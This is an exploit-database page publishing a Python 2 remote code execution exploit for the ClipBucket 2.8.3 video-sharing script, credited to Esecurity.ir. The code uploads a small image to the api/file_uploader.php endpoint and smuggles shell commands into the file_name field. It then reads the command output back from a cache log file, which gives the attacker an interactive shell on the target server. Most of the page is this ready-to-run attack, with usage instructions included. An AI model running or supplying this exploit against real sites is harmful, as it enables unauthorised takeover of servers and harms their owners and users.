ClipBucket 2.8.3 Remote Code Execution

2017.10.05
Credit: Esecurity.ir
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

# Exploit Title: ClipBucket PHP Script Remote Code Execution (RCE) # Date: 2017-10-04 # Exploit Author: Esecurity.ir # Vendor Homepage: https://clipbucket.com/ # Version: 2.8.3 # Exploit Code By : Meisam Monsef - Email : meisamrce@gmail.com - TelgramID : @meisamrce # Usage Exploit : exploit.py http://target.com/path/ import sys,os try: import requests except Exception as e: print 'please install module requests!' sys.exit() img = 'temp.jpg' uploadUrl = "api/file_uploader.php" h = {'user-agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.96 Safari/537.36'} def getShell(url): try: r = requests.get(url+'cache/1.log',headers=h) if r.status_code == 200: return r.content else: print 'Sorry site is not vulnerable ' sys.exit() except Exception as e: print e sys.exit() def exploit(url): while (1): cmd = raw_input('$') if cmd == '' or cmd == 'exit': break file_ = {'Filedata': (img, open(img, 'r'),'image/jpg')} data = {'file_name':'a.jpg;'+cmd+' > ../cache/1.log;a.jpg'} try: r = requests.post(url+uploadUrl, files=file_,data=data,headers=h) if r.status_code == 200: if '"success":"yes"' in r.content: print getShell(url) else: print 'Sorry site is not vulnerable ' break else: print 'Sorry site is not vulnerable ' break except Exception as e: print e break if not os.path.exists(img): print 'please create tiny image file name is ' + img sys.exit() if len(sys.argv) == 2 : exploit(sys.argv[1]) else: print "Usage Exploit : exploit.py http://target.com/path/";


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2017, cxsecurity.com

 

Back to Top